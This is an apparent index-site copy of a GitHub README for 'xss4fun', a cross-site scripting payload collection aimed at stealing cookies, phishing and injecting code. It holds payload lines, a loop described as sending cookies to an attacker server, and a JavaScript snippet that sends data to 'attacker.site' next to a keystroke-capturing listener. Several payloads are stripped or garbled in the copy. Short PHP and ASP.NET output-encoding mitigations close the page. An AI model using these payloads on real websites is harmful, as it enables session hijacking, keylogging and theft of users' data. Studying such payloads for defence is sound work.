An open API service indexing awesome lists of open source software.

https://github.com/p1ngul1n0/xss4fun

XSS payloads just for fun.
https://github.com/p1ngul1n0/xss4fun

cross-site-scripting pentest pentesting web xss

Last synced: 3 months ago
JSON representation

XSS payloads just for fun.

Awesome Lists containing this project

README

          

# XSS4FUN :cookie:
Cross-Site-Scripting just for fun.

## Cross-Site-Scripting Utils:
- Steal cookies for session hijacking.
- Modify Webpage to perform phishing.
- Inject malicious code.
## Basic payloads:
- alert(1)

## Useful payloads:
- ** **
- To include malicious javascript code in page.
- **\**
- When the **** is being filtered by the Web Application, you can use javascript events.
- **<script>alert(localStorage.getItem('salary'))**
- To collect sensitive information stored in Browser Local Storage.
- ****
- This payload starts a loop, so the browser start sending multiple requests to the attacker server with the cookie.

## Javascript useful codes:
- To perform HTTP GET request
```
var xhttp = new XMLHttpRequest(); //Init xhttp object
xhttp.open("GET", "https://attacker.site/strokes.php?data=data, true); //GET request
xhttp.send(); //Send request
```
- Collect pressed key
```
document.addEventListener("keydown",function(e){
pressed_key = e.key;
}
```
## Mitigations
## PHP
Using **htmlspecialchars** to convert special characters to HTML.
```
$word = htmlspecialchars($_GET['word']);
```
## ASP NET
Using **HtmlEncode** to convert special characters to HTML.
```
user_input = System.Web.HttpUtility.HtmlEncode(user_input);
```
So this **alert(1)** becomes this **\<script\>alert(1)\</script&gt**

## Automated Detection
## xss4fun.py
Using selenium to find input fields and inject payloads, if the injection is sucessful, a printscreen is made.

## References
- ASP NET Server.HTMLEncode https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525347%28v%3dvs.90%29
- PHP html specialchars https://www.php.net/manual/en/function.htmlspecialchars.php